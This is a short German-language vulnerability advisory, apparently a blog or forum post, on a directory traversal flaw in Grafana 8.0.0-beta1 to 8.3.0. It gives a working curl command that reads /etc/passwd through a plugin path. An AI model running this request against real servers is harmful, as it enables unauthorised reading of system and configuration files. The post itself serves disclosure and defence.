
Von PrivacyHunter
Betroffene Versionen: Grafana 8.0.0-beta1 bis 8.3.0 (gepatchte Versionen ausgenommen)
Schwachstellentyp: Directory Traversal (Verzeichnisdurchquerung)
Auswirkung: Kritisch (Critical)
Plattform: Grafana (Open-Source-Monitoring- und Observability-Plattform)
⚠️ Details der Schwachstelle In Grafana kann über die folgende URL eine Verzeichnisdurchquerung durchgeführt werden:
Code http://<grafana_host>/public/plugins// Dadurch kann ein Angreifer lokale Dateien auf dem Server lesen, z. B. /etc/passwd oder Konfigurationsdateien ohne Berechtigung einsehen.
🔥 Exploit-Beispiel Einfache Anfrage zum Lesen einer Datei:
bash curl http://target:3000/public/plugins/alertlist/../../../../../../../../etc/passwd Mit der obigen Anfrage kann die Liste der Benutzer auf einem Linux-System abgerufen werden.